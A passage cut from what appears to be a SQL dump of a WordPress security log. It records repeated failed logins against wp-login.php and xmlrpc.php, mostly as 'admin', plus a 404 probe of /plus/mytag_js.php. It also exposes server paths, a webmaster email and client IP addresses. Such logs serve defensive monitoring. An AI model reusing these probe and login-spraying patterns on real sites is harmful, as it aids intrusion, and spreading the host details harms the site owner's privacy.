REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydnXURUVLSjYCXpcIzTwAAAMs\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydnXURUVLSjYCXpcIzTwAAAMs\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZydnXURUVLSjYCXpcIzTwAAAMs\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"55556\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:10:\"SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZydnXURUVLSjYCXpcIzTwAAAMs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570545053.7045\";s:12:\"REQUEST_TIME\";s:10:\"1570545053\";}}','notice','2019-10-08 14:30:55','2019-10-08 14:30:54',35053632,36858744,'https://bintara.com.my/plus/mytag_js.php?aid=9527',1,0,'111.119.40.113'),(24847,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.101.143.24\";s:11:\"REMOTE_PORT\";s:5:\"45294\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGST0QGijxhVPhG1M0K1AAAAAQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568772687.1865\";s:12:\"REQUEST_TIME\";s:10:\"1568772687\";}}','notice','2019-09-18 02:11:28','2019-09-18 02:11:27',18252048,19549680,'https://bintara.com.my/xmlrpc.php',1,0,'46.101.143.24'),(24848,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"67.198.130.240\";s:11:\"REMOTE_PORT\";s:5:\"39990\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGTm61FqYKvioG46Y4J2QAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568773019.3291\";s:12:\"REQUEST_TIME\";s:10:\"1568773019\";}}','notice','2019-09-18 02:17:01','2019-09-18 02:16:59',17737952,19228056,'https://bintara.com.my/wp-login.php',1,0,'67.198.130.240'),(24806,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"216.10.243.118\";s:11:\"REMOTE_PORT\";s:5:\"54446\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYF4syqbKGlf1IVly7OCRwAAAVY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568766131.6155\";s:12:\"REQUEST_TIME\";s:10:\"1568766131\";}}','notice','2019-09-18 00:22:14','2019-09-18 00:22:12',17744200,19235832,'https://bintara.com.my/wp-login.php',1,0,'216.10.243.118'),(24846,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.101.143.24\";s:11:\"REMOTE_PORT\";s:5:\"44922\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGSTK1FqYKvioG46Y4IbwAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568772684.1037\";s:12:\"REQUEST_TIME\";s:10:\"1568772684\";}}','notice','2019-09-18 02:11:25','2019-09-18 02:11:24',17737664,19228112,'https://bintara.com.my/wp-login.php',1,0,'46.101.143.24'),(24845,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"177.36.8.226\";s:11:\"REMOTE_PORT\";s:5:\"54306\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGSHq1FqYKvioG46Y4H4wAAAIc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568772638.331\";s:12:\"REQUEST_TIME\";s:10:\"1568772638\";}}','notice','2019-09-18 02:10:39','2019-09-18 02:10:38',18252920,19549360,'https://bintara.com.my/xmlrpc.php',1,0,'177.36.8.226'),(24844,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"177.36.8.226\";s:11:\"REMOTE_PORT\";s:5:\"53492\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGSGq1FqYKvioG46Y4H4QAAAII\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568772634.9569\";s:12:\"REQUEST_TIME\";s:10:\"1568772634\";}}','notice','2019-09-18 02:10:36','2019-09-18 02:10:35',17738152,19226280,'https://bintara.com.my/wp-login.php',1,0,'177.36.8.226'),(24843,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"167.114.118.135\";s:11:\"REMOTE_PORT\";s:5:\"53060\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGPHG4SfF9g@8lNlxwp-QAAAE0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568771868.7102\";s:12:\"REQUEST_TIME\";s:10:\"1568771868\";}}','notice','2019-09-18 01:57:50','2019-09-18 01:57:49',18252368,19549400,'https://bintara.com.my/xmlrpc.php',1,0,'167.114.118.135'),(24842,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"167.114.118.135\";s:11:\"REMOTE_PORT\";s:5:\"51372\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGPGSqbKGlf1IVly7ONHAAAAUY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568771865.6299\";s:12:\"REQUEST_TIME\";s:10:\"1568771865\";}}','notice','2019-09-18 01:57:46','2019-09-18 01:57:46',17737968,19228280,'https://bintara.com.my/wp-login.php',1,0,'167.114.118.135'),(24841,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 